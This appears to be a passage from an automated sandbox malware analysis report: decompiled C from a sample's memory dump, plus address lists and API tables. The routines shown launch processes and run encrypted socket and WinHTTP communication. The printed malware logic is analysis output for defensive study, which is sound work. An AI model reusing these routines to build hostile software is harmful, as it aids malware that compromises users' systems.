																E0039BB40( *((intOrPtr*)(_v12 + _t123 - 4)));
																_t263 = _t263 + 4;
																__eflags = _t255;
															}
															E0039BB40(_v12);
															_t261 = _t263 + 4;
														} else {
															_t52 = _v12 + 4; // 0x8bfc458b
															_t183 =  *_t52;
															_t257 = _v48 + _a4;
															__imp___wtoi(_t183);
															 *((intOrPtr*)(_t257 + _v56)) = _t183;
															 *_t257 = E003966C0( *_v12);
															_t264 = _t263 + 8;
															_t258 = 8;
															do {
																_t242 =  *((intOrPtr*)(_t258 + _v12 - 4));
																_t258 = _t258 - 4;
																E0039BB40(_t242);
																_t264 = _t264 + 4;
															} while (_t258 > 0);
															E0039BB40(_v12);
															_t261 = _t264 + 4;
															_t259 = 0;
															do {
																_t189 = rand();
																asm("cdq");
																_t243 = _t189 % _v8;
																_t191 = 0;
																if(_t246 > 0) {
																	while( *((intOrPtr*)(_t194 + _t191 * 4)) != _t243) {
																		_t191 = _t191 + 1;
																		if(_t191 < _t246) {
																			continue;
																		}
																		goto L23;
																	}
																}
																L23:
																if(_t191 == _t246) {
																	 *_a4 = _t243;
																} else {
																	goto L24;
																}
																L27:
																if(_t259 == 0x400) {
																	_t220 = _t243 + 1;
																	while(_t220 != _t243) {
																		if(_t220 == _v8) {
																			_t220 = 0;
																		}
																		_t192 = 0;
																		if(_t246 > 0) {
																			while( *((intOrPtr*)(_t194 + _t192 * 4)) != _t220) {
																				_t192 = _t192 + 1;
																				if(_t192 < _t246) {
																					continue;
																				}
																				goto L36;
																			}
																		}
																		L36:
																		if(_t192 == _t246) {
																			 *_a4 = _t220;
																		} else {
																			goto L37;
																		}
																		goto L40;
																		L37:
																		_t220 = _t220 + 1;
																	}
																}
																goto L40;
																L24:
																_t259 = _t259 + 1;
															} while (_t259 < 0x400);
															goto L27;
														}
													}
												}
											}
											goto L48;
										}
									}
									L48:
									_t246 = 0;
								}
								E0039BB40(_v44);
								_t261 = _t261 + 4;
							}
							_t145 = _v32;
							if(_v32 != _t246) {
								E0039BB40(_t145);
								_t261 = _t261 + 4;
							}
							if(_t194 != _t246) {
								E0039BB40(_t194);
							}
						}
					}
				}
				_t128 = _v24;
				if(_t128 != _t246) {
					__imp__#6(_t128);
				}
				_t129 = _v20;
				if(_t129 != _t246) {
					__imp__#6(_t129);
				}
				_t130 = _v16;
				if(_t130 != _t246) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t130 + 8))))(_t130);
				}
				_t131 = _v28;
				if(_t131 != _t246) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t131 + 8))))(_t131);
				}
				return _v36;
			}























































    0x0039bf6a
    0x0039bf73
    0x0039bf75
    0x0039bf7b
    0x0039bf7c
    0x0039bf7d
    0x0039bf80
    0x0039bf83
    0x0039bf86
    0x0039bf89
    0x0039bf8c
    0x0039bf8f
    0x0039bf92
    0x0039bf99
    0x0039bfb2
    0x0039bfb3
    0x0039bfb8
    0x0039bfbe
    0x0039bfc6
    0x0039bfc7
    0x0039bfcf
    0x0039bfe7
    0x0039bff5
    0x0039c000
    0x0039c00c
    0x0039c011
    0x0039c014
    0x0039c018
    0x0039c01e
    0x0039c023
    0x0039c02c
    0x0039c1ea
    0x0039c1ea
    0x0039c1ed
    0x0039c1f2
    0x0039c1f5
    0x0039c1fa
    0x0039c1fa
    0x0039c1fd
    0x0039c202
    0x0039c205
    0x0039c20a
    0x0039c20a
    0x0039c222
    0x0039c22f
    0x0039c234
    0x0039c237
    0x0039c23a
    0x0039c23d
    0x0039c241
    0x0039c243
    0x0039c252
    0x0039c25e
    0x0039c261
    0x0039c264
    0x0039c265
    0x0039c243
    0x0039c269
    0x0039c26c
    0x0039c273
    0x0039c032
    0x0039c034
    0x0039c03b
    0x0039c03e
    0x0039c041
    0x0039c041
    0x0039c046
    0x0039c049
    0x0039c049
    0x0039c04f
    0x0039c052
    0x0039c05b
    0x0039c05e
    0x0039c05e
    0x0039c064
    0x0039c06a
    0x0039c06b
    0x0039c074
    0x0039c075
    0x0039c07d
    0x00000000
    0x00000000
    0x0039c083
    0x0039c093
    0x0039c095
    0x0039c097
    0x0039c0a6
    0x0039c0ae
    0x0039c0b4
    0x0039c0bd
    0x0039c0c4
    0x0039c0c9
    0x0039c1ca
    0x0039c1ca
    0x0039c1d3
    0x0039c1d5
    0x0039c1d9
    0x0039c1da
    0x0039c1e4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0039c0cf
    0x0039c0cf
    0x0039c0d7
    0x0039c0d8
    0x0039c0e0
    0x0039c0fa
    0x0039c0fc
    0x0039c102
    0x0039c2eb
    0x0039c2ed
    0x0039c2f3
    0x0039c2f7
    0x0039c2f9
    0x0039c2fe
    0x0039c301
    0x0039c301
    0x0039c309
    0x0039c30e
    0x0039c108
    0x0039c10b
    0x0039c10b
    0x0039c111
    0x0039c115
    0x0039c11e
    0x0039c12c
    0x0039c12e
    0x0039c131
    0x0039c136
    0x0039c139
    0x0039c13d
    0x0039c141
    0x0039c146
    0x0039c149
    0x0039c151
    0x0039c156
    0x0039c159
    0x0039c160
    0x0039c160
    0x0039c166
    0x0039c167
    0x0039c16a
    0x0039c16e
    0x0039c170
    0x0039c175
    0x0039c178
    0x00000000
    0x00000000
    0x00000000
    0x0039c178
    0x0039c170
    0x0039c17a
    0x0039c17c
    0x0039c18c
    0x00000000
    0x00000000
    0x00000000
    0x0039c18e
    0x0039c194
    0x0039c196
    0x0039c19b
    0x0039c1a3
    0x0039c1a5
    0x0039c1a5
    0x0039c1a7
    0x0039c1ab
    0x0039c1b0
    0x0039c1b5
    0x0039c1b8
    0x00000000
    0x00000000
    0x00000000
    0x0039c1b8
    0x0039c1b0
    0x0039c1ba
    0x0039c1bc
    0x0039c1c8
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0039c1be
    0x0039c1be
    0x0039c1bf
    0x0039c19b
    0x00000000
    0x0039c17e
    0x0039c17e
    0x0039c17f
    0x00000000
    0x0039c187
    0x0039c102
    0x0039c0e0
    0x0039c0c9
    0x00000000
    0x0039c097
    0x0039c041
    0x0039c27a
    0x0039c27a
    0x0039c27a
    0x0039c280
    0x0039c285
    0x0039c285
    0x0039c288
    0x0039c28d
    0x0039c290
    0x0039c295
    0x0039c295
    0x0039c29a
    0x0039c29d
    0x0039c2a2
    0x0039c2a5
    0x0039bfcf
    0x0039bfb8
    0x0039c2a6
    0x0039c2ab
    0x0039c2ae
    0x0039c2ae
    0x0039c2b4
    0x0039c2b9
    0x0039c2bc
    0x0039c2bc
    0x0039c2c2
    0x0039c2c7
    0x0039c2cf
    0x0039c2cf
    0x0039c2d1
    0x0039c2d8
    0x0039c2e0
    0x0039c2e0
    0x0039c2e8

    APIs
    • SysFreeString.OLEAUT32(?), ref: 0039C049
    • SysFreeString.OLEAUT32(?), ref: 0039C05E
    • _wtoi.MSVCRT ref: 0039C115
    • rand.MSVCRT ref: 0039C160
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    • SysFreeString.OLEAUT32(?), ref: 0039C2AE
    • SysFreeString.OLEAUT32(?), ref: 0039C2BC
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B0DCE, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 94
    APIs
      • Part of subcall function 003B1D30: WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003B1D73
    • ??3@YAXPAX@Z.MSVCRT ref: 003B1082
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B0420, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 52process
    C-Code - Quality: 100%
    			E003B0420(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				int _t18;
				int _t31;

				memset( &_v88, 0, 0x44);
				_v20.hProcess = 0;
				_v20.hThread = 0;
				_v20.dwProcessId = 0;
				_v20.dwThreadId = 0;
				_v88.cb = 0x44;
				_v88.dwFlags = 1;
				_t18 = CreateProcessA(0, _a4, 0, 0, 0, 0x10, 0, 0,  &_v88,  &_v20);
				_t31 = _t18;
				if(_t31 != 0) {
					WaitForSingleObject(_v20.hProcess, 0x2710);
					CloseHandle(_v20);
					CloseHandle(_v20.hThread);
					return _t31;
				}
				return _t18;
			}







    0x003b042f
    0x003b0448
    0x003b044b
    0x003b044e
    0x003b0451
    0x003b045a
    0x003b0461
    0x003b0468
    0x003b046e
    0x003b0472
    0x003b047e
    0x003b048e
    0x003b0494
    0x00000000
    0x003b0498
    0x003b049d

    APIs
    • memset.MSVCRT ref: 003B042F
    • CreateProcessA.KERNEL32(00000000,003B0568,00000000,00000000,00000000,00000010,00000000,00000000,?,?), ref: 003B0468
    • WaitForSingleObject.KERNEL32(?,00002710), ref: 003B047E
    • CloseHandle.KERNEL32(?), ref: 003B048E
    • CloseHandle.KERNEL32(?), ref: 003B0494
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A48F6, Relevance: 12.2, APIs: 8, Instructions: 247network
    C-Code - Quality: 16%
    			E003A48F6(intOrPtr* __ebx, intOrPtr _a4, void* _a8, int _a12) {
				void* _v8;
				void* _v12;
				signed int _v16;
				void* __esi;
				void* _t92;
				void* _t93;
				int _t94;
				void* _t98;
				signed int _t99;
				signed int _t100;
				void* _t108;
				void* _t110;
				void _t112;
				signed int _t113;
				signed int _t114;
				void* _t116;
				void* _t118;
				signed short _t120;
				signed int _t121;
				void* _t122;
				int _t124;
				void* _t132;
				void* _t135;
				void* _t139;
				intOrPtr* _t147;
				intOrPtr _t152;
				int _t156;
				signed int _t159;
				signed int _t162;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				signed int _t169;
				int _t176;
				void* _t181;
				intOrPtr _t183;
				int _t184;
				void* _t188;
				void* _t189;
				void* _t190;
				void* _t191;

				_t147 = __ebx;
				_t181 = 0x200;
				_t92 =  *0x3b8538(0x200);
				_v12 = _t92;
				_t93 =  *0x3b8538(0x200);
				_v16 = _v16 & 0x00000000;
				_t176 = _a12;
				_v8 = _t93;
				_t94 =  *(__ebx + 0x32c);
				if(_t94 == 0) {
					L4:
					if(_v16 == _t176) {
						L39:
						 *0x3b8540(_v12);
						 *0x3b8540(_v8);
						_t98 = 1;
						L41:
						return _t98;
					}
					while(1) {
						_t152 = _a4;
						if(_t152 != 0) {
							goto L14;
						}
						_t113 =  *(_t147 + 0x330);
						if(_t113 < 0x384) {
							L11:
							_t114 =  *(_t147 + 0x330);
							if(_t114 < 0x1c2) {
								L22:
								if(E003AFB73( *_t147, _v12, _t181) != 0x200) {
									L40:
									 *0x3b8540(_v12);
									 *0x3b8540(_v8);
									_t98 = 0;
									goto L41;
								}
								_t183 = _a4;
								if(_t183 != 0) {
									 *((intOrPtr*)(_t183 + 0x130)) =  *((intOrPtr*)(_t183 + 0x130)) + 1;
								} else {
									 *(_t147 + 0x330) =  *(_t147 + 0x330) + 1;
								}
								if( *((char*)(_v12 + 2)) != 3) {
									goto L40;
								} else {
									_t56 = _t147 + 0x134; // 0x134
									_t57 = _t147 + 0x124; // 0x124
									_push(_v8);
									_t108 = _v12 + 3;
									if(_t183 == 0) {
										_push(0x1fd);
										_push(_t108);
										_t69 = _t147 + 0x100; // 0x100
										_t110 = E003A3BB7();
										_t189 = _t189 + 0x18;
										if(_t110 == 0) {
											goto L40;
										}
										L32:
										_t112 =  *_v8;
										if(_t112 == 5) {
											L38:
											if(_v16 != _t176) {
												_t181 = 0x200;
												continue;
											}
											goto L39;
										}
										if(_t112 != 2) {
											goto L40;
										}
										_t120 =  *(_v8 + 9) & 0x0000ffff;
										__imp__#9(_t120);
										_t184 = _t120 & 0x0000ffff;
										if(_t184 > 0x1f2) {
											goto L40;
										}
										_t121 = _v16;
										_t156 = _t176 - _t121;
										_t122 = _t121 + _a8;
										if(_t184 > _t156) {
											memcpy(_t122, _v8 + 0xb, _t156);
											_t159 = _v16;
											_t124 = _t184 - _t176 + _t159;
											 *(_t147 + 0x32c) = _t124;
											_t85 = _t147 + 0x13a; // 0x13a
											memcpy(_t85, _v8 - _t159 + _t176 + 0xb, _t124);
											_t189 = _t189 + 0x18;
											_v16 = _t176;
										} else {
											memcpy(_t122, _v8 + 0xb, _t184);
											_t189 = _t189 + 0xc;
											_v16 = _v16 + _t184;
										}
										goto L38;
									}
									_push(0x1fd);
									_push(_t108);
									_t60 = _t147 + 0x100; // 0x100
									_t132 = E003A3BB7();
									_t190 = _t189 + 0x18;
									if(_t132 == 0) {
										goto L40;
									}
									_t135 = E003A3BB7(_t183 + 0xf8, _v8, 0x1fd, _v12, _t183 + 0x11c, _t183 + 0x12c);
									_t191 = _t190 + 0x18;
									if(_t135 == 0) {
										goto L40;
									}
									_t162 = 0x7f;
									memcpy(_v8, _v12, _t162 << 2);
									_t189 = _t191 + 0xc;
									asm("movsb");
									_t176 = _a12;
									goto L32;
								}
							}
							_t166 = 0x32;
							_t169 = _t114 % _t166;
							if(_t169 != 0) {
								goto L22;
							}
							_push(1);
							_push(_t169);
							L21:
							_push(_t147);
							_t116 = E003A43AE();
							_t189 = _t189 + 0xc;
							if(_t116 == 0) {
								goto L40;
							}
							goto L22;
						}
						_t167 = 0x64;
						_t175 = _t113 % _t167;
						if(_t113 % _t167 != 0) {
							goto L11;
						}
						_t118 = E003A43AE(_t147, _t175, _t175);
						_t189 = _t189 + 0xc;
						if(_t118 == 0) {
							goto L40;
						}
						goto L11;
						L14:
						_t99 =  *(_t152 + 0x130);
						if(_t99 < 0x384) {
							L18:
							_t100 =  *(_t152 + 0x130);
							if(_t100 < 0x1c2) {
								goto L22;
							}
							_t164 = 0x32;
							if(_t100 % _t164 != 0) {
								goto L22;
							}
							_push(1);
							_push(_a4);
							goto L21;
						}
						_t165 = 0x64;
						_t173 = _t99 % _t165;
						if(_t99 % _t165 != 0) {
							L17:
							_t152 = _a4;
							goto L18;
						}
						_t139 = E003A43AE(_t147, _a4, _t173);
						_t189 = _t189 + 0xc;
						if(_t139 == 0) {
							goto L40;
						}
						goto L17;
					}
				}
				if(_t94 <= _t176) {
					_t17 = _t147 + 0x13a; // 0x13a
					memcpy(_a8, _t17, _t94);
					_t189 = _t189 + 0xc;
					 *(__ebx + 0x32c) =  *(__ebx + 0x32c) & 0x00000000;
					_v16 =  *(__ebx + 0x32c);
					goto L4;
				}
				_t7 = _t147 + 0x13a; // 0x13a
				_t188 = _t7;
				memcpy(_a8, _t188, _t176);
				 *(__ebx + 0x32c) =  *(__ebx + 0x32c) - _t176;
				_t13 = _t176 + 0x13a; // 0x13a
				memcpy(_v12, __ebx + _t13,  *(__ebx + 0x32c));
				memcpy(_t188, _v12,  *(__ebx + 0x32c));
				goto L39;
			}













































    0x003a48f6
    0x003a48fe
    0x003a4904
    0x003a490b
    0x003a490e
    0x003a4914
    0x003a4918
    0x003a491b
    0x003a491e
    0x003a4928
    0x003a4994
    0x003a4997
    0x003a4bae
    0x003a4bb1
    0x003a4bba
    0x003a4bc2
    0x003a4bd9
    0x003a4bde
    0x003a4bde
    0x003a49a4
    0x003a49a4
    0x003a49a9
    0x00000000
    0x00000000
    0x003a49ab
    0x003a49b6
    0x003a49d6
    0x003a49d6
    0x003a49e1
    0x003a4a51
    0x003a4a63
    0x003a4bc5
    0x003a4bc8
    0x003a4bd1
    0x003a4bd7
    0x00000000
    0x003a4bd7
    0x003a4a69
    0x003a4a6e
    0x003a4a78
    0x003a4a70
    0x003a4a70
    0x003a4a70
    0x003a4a85
    0x00000000
    0x003a4a8b
    0x003a4a8b
    0x003a4a92
    0x003a4a9c
    0x003a4a9f
    0x003a4aa4
    0x003a4b01
    0x003a4b06
    0x003a4b07
    0x003a4b0e
    0x003a4b13
    0x003a4b18
    0x00000000
    0x00000000
    0x003a4b1e
    0x003a4b21
    0x003a4b25
    0x003a4ba5
    0x003a4ba8
    0x003a499f
    0x00000000
    0x003a499f
    0x00000000
    0x003a4ba8
    0x003a4b29
    0x00000000
    0x00000000
    0x003a4b32
    0x003a4b37
    0x003a4b3d
    0x003a4b46
    0x00000000
    0x00000000
    0x003a4b48
    0x003a4b4d
    0x003a4b4f
    0x003a4b54
    0x003a4b75
    0x003a4b7a
    0x003a4b7f
    0x003a4b83
    0x003a4b93
    0x003a4b9a
    0x003a4b9f
    0x003a4ba2
    0x003a4b56
    0x003a4b5f
    0x003a4b64
    0x003a4b67
    0x003a4b67
    0x00000000
    0x003a4b54
    0x003a4aab
    0x003a4aac
    0x003a4aad
    0x003a4ab4
    0x003a4ab9
    0x003a4abe
    0x00000000
    0x00000000
    0x003a4ae0
    0x003a4ae5
    0x003a4aea
    0x00000000
    0x00000000
    0x003a4af8
    0x003a4af9
    0x003a4af9
    0x003a4afb
    0x003a4afc
    0x00000000
    0x003a4afc
    0x003a4a85
    0x003a49e7
    0x003a49e8
    0x003a49ec
    0x00000000
    0x00000000
    0x003a49ee
    0x003a49f0
    0x003a4a40
    0x003a4a40
    0x003a4a41
    0x003a4a46
    0x003a4a4b
    0x00000000
    0x00000000
    0x00000000
    0x003a4a4b
    0x003a49bc
    0x003a49bd
    0x003a49c1
    0x00000000
    0x00000000
    0x003a49c6
    0x003a49cb
    0x003a49d0
    0x00000000
    0x00000000
    0x00000000
    0x003a49f3
    0x003a49f3
    0x003a49fe
    0x003a4a23
    0x003a4a23
    0x003a4a2e
    0x00000000
    0x00000000
    0x003a4a34
    0x003a4a39
    0x00000000
    0x00000000
    0x003a4a3b
    0x003a4a3d
    0x00000000
    0x003a4a3d
    0x003a4a04
    0x003a4a05
    0x003a4a09
    0x003a4a20
    0x003a4a20
    0x00000000
    0x003a4a20
    0x003a4a10
    0x003a4a15
    0x003a4a1a
    0x00000000
    0x00000000
    0x00000000
    0x003a4a1a
    0x003a49a4
    0x003a492c
    0x003a4972
    0x003a497c
    0x003a4987
    0x003a498a
    0x003a4991
    0x00000000
    0x003a4991
    0x003a492f
    0x003a492f
    0x003a4939
    0x003a493e
    0x003a494a
    0x003a4955
    0x003a4964
    0x00000000

    APIs
    • memcpy.MSVCRT ref: 003A4939
    • memcpy.MSVCRT ref: 003A4955
    • memcpy.MSVCRT ref: 003A4964
    • memcpy.MSVCRT ref: 003A497C
    • memcpy.MSVCRT ref: 003A4B9A
      • Part of subcall function 003A43AE: memset.MSVCRT ref: 003A43DC
      • Part of subcall function 003A43AE: htons.WS2_32(?), ref: 003A43F8
      • Part of subcall function 003A43AE: memset.MSVCRT ref: 003A44C5
      • Part of subcall function 003A43AE: memset.MSVCRT ref: 003A44E8
      • Part of subcall function 003A43AE: htons.WS2_32(?), ref: 003A4524
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBB0
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBC9
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBD8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBED
      • Part of subcall function 003AFB73: htons.WS2_32(?), ref: 003AFC25
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCA2
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCB8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCD6
      • Part of subcall function 003A3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003A3BCF
      • Part of subcall function 003A3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003A3C60
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3C71
      • Part of subcall function 003A3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003A3D87
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DD2
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3DF2
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DFD
    • htons.WS2_32(?), ref: 003A4B37
    • memcpy.MSVCRT ref: 003A4B5F
    • memcpy.MSVCRT ref: 003A4B75
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003AFB73, Relevance: 12.1, APIs: 8, Instructions: 143network
    C-Code - Quality: 56%
    			E003AFB73(intOrPtr* __esi, void* _a4, int _a8) {
				void* _v8;
				void* _v12;
				void* __ebx;
				void* _t42;
				void* _t43;
				int _t44;
				int _t48;
				signed short _t49;
				void _t50;
				signed int _t51;
				void* _t52;
				int _t54;
				void* _t72;
				int _t73;
				void* _t75;
				int _t77;
				int _t79;
				void* _t80;
				signed int _t87;
				int _t91;
				void* _t97;
				int _t99;
				void* _t101;
				intOrPtr* _t102;
				void* _t103;
				void* _t104;

				_t102 = __esi;
				_t42 =  *0x3b8538(0x10000, _t97, _t72, _t80, _t80);
				_v8 = _t42;
				_t43 =  *0x3b8538(0x10000);
				_t73 = _a8;
				_v12 = _t43;
				_t44 =  *(__esi + 0x1006c);
				_t99 = 0;
				if(_t44 == 0) {
					L4:
					__eflags = _t99 - _t73;
					if(_t99 != _t73) {
						while(1) {
							_t75 = _v8;
							_t48 = E003AF4EF(_t75,  *_t102, 5);
							__eflags = _t48;
							if(_t48 == 0) {
								break;
							}
							_t49 =  *(_t75 + 3) & 0x0000ffff;
							__imp__#9(_t49);
							_t87 = _t49 & 0x0000ffff;
							_t50 =  *_t75;
							__eflags = _t50 - 0x16;
							if(_t50 == 0x16) {
								L8:
								_t51 = E003AF4EF(_t75,  *_t102, _t87);
								__eflags = _t51;
								if(_t51 == 0) {
									break;
								} else {
									_t91 = _t51 & 0x8000000f;
									__eflags = _t91;
									if(__eflags < 0) {
										__eflags = (_t91 - 0x00000001 | 0xfffffff0) + 1;
									}
									if(__eflags != 0) {
										break;
									} else {
										 *((intOrPtr*)(_t102 + 0x10078)) =  *((intOrPtr*)(_t102 + 0x10078)) + 1;
										_t24 = _t102 + 0x5c; // 0x105c
										asm("adc dword [esi+0x1007c], 0x0");
										_t25 = _t102 + 0x3c; // 0x103c
										_t52 = E003AEF6B(_t75, _t51, _v12, _t25, _t24, 0);
										_t104 = _t103 + 0x18;
										_t77 = _t52 - 0x15;
										__eflags = _t77;
										if(_t77 < 0) {
											break;
										} else {
											_t54 = _a8 - _t99;
											__eflags = _t77 - _t54;
											if(_t77 > _t54) {
												memcpy(_a4 + _t99, _v12, _t54);
												_t79 = _t77 - _a8 + _t99;
												__eflags = _t79;
												_t35 = _t102 + 0x6c; // 0x106c
												 *(_t102 + 0x1006c) = _t79;
												memcpy(_t35, _v12 - _t99 + _a8, _t79);
												_t99 = _a8;
												_t103 = _t104 + 0x18;
											} else {
												memcpy(_a4 + _t99, _v12, _t77);
												_t103 = _t104 + 0xc;
												_t99 = _t99 + _t77;
											}
											__eflags = _t99 - _a8;
											if(_t99 != _a8) {
												continue;
											} else {
												_t73 = _a8;
											}
										}
									}
								}
							} else {
								__eflags = _t50 - 0x17;
								if(_t50 != 0x17) {
									break;
								} else {
									goto L8;
								}
							}
							goto L18;
						}
						_t73 = 0;
					}
				} else {
					if(_t44 <= _t73) {
						_t15 = _t102 + 0x6c; // 0x106c
						memcpy(_a4, _t15, _t44);
						_t99 =  *(__esi + 0x1006c);
						_t103 = _t103 + 0xc;
						_t18 = __esi + 0x1006c;
						 *_t18 =  *(__esi + 0x1006c) & 0x00000000;
						__eflags =  *_t18;
						goto L4;
					} else {
						_t5 = _t102 + 0x6c; // 0x106c
						_t101 = _t5;
						memcpy(_a4, _t101, _t73);
						 *(__esi + 0x1006c) =  *(__esi + 0x1006c) - _t73;
						_t11 = _t73 + 0x6c; // 0x106c
						memcpy(_v8, __esi + _t11,  *(__esi + 0x1006c));
						memcpy(_t101, _v8,  *(__esi + 0x1006c));
					}
				}
				L18:
				 *0x3b8540(_v12);
				 *0x3b8540(_v8);
				return _t73;
			}





























    0x003afb73
    0x003afb80
    0x003afb87
    0x003afb8a
    0x003afb90
    0x003afb93
    0x003afb96
    0x003afb9d
    0x003afba2
    0x003afc02
    0x003afc02
    0x003afc04
    0x003afc0a
    0x003afc0a
    0x003afc11
    0x003afc18
    0x003afc1a
    0x00000000
    0x00000000
    0x003afc20
    0x003afc25
    0x003afc2b
    0x003afc2e
    0x003afc30
    0x003afc32
    0x003afc3c
    0x003afc3f
    0x003afc46
    0x003afc48
    0x00000000
    0x003afc4e
    0x003afc50
    0x003afc50
    0x003afc56
    0x003afc5c
    0x003afc5c
    0x003afc5d
    0x00000000
    0x003afc63
    0x003afc63
    0x003afc6c
    0x003afc6f
    0x003afc77
    0x003afc80
    0x003afc87
    0x003afc8a
    0x003afc8a
    0x003afc8d
    0x00000000
    0x003afc8f
    0x003afc92
    0x003afc94
    0x003afc96
    0x003afcb8
    0x003afcc8
    0x003afcc8
    0x003afccc
    0x003afcd0
    0x003afcd6
    0x003afcdb
    0x003afcde
    0x003afc98
    0x003afca2
    0x003afca7
    0x003afcaa
    0x003afcaa
    0x003afce1
    0x003afce4
    0x00000000
    0x003afcea
    0x003afcea
    0x003afcea
    0x003afce4
    0x003afc8d
    0x003afc5d
    0x003afc34
    0x003afc34
    0x003afc36
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003afc36
    0x00000000
    0x003afc32
    0x003afd07
    0x003afd07
    0x003afba4
    0x003afba6
    0x003afbe6
    0x003afbed
    0x003afbf2
    0x003afbf8
    0x003afbfb
    0x003afbfb
    0x003afbfb
    0x00000000
    0x003afba8
    0x003afba9
    0x003afba9
    0x003afbb0
    0x003afbb5
    0x003afbc1
    0x003afbc9
    0x003afbd8
    0x003afbdd
    0x003afba6
    0x003afced
    0x003afcf0
    0x003afcf9
    0x003afd06

    APIs
    • memcpy.MSVCRT ref: 003AFBB0
    • memcpy.MSVCRT ref: 003AFBC9
    • memcpy.MSVCRT ref: 003AFBD8
    • memcpy.MSVCRT ref: 003AFBED
      • Part of subcall function 003AF4EF: recv.WS2_32(?,00000000,003AF7A5,00000000), ref: 003AF519
    • htons.WS2_32(?), ref: 003AFC25
      • Part of subcall function 003AEF6B: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000024,?,?,00000001,?,0000000F,00000010), ref: 003AEFA8
      • Part of subcall function 003AEF6B: CryptImportKey.ADVAPI32(00000000,00000000,0000001C,00000000,00000000,00000010,00000010), ref: 003AEFF7
      • Part of subcall function 003AEF6B: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 003AF00A
      • Part of subcall function 003AEF6B: memcpy.MSVCRT ref: 003AF01E
      • Part of subcall function 003AEF6B: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000000), ref: 003AF040
      • Part of subcall function 003AEF6B: CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 003AF05D
      • Part of subcall function 003AEF6B: CryptDestroyKey.ADVAPI32(?), ref: 003AF06A
      • Part of subcall function 003AEF6B: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003AF074
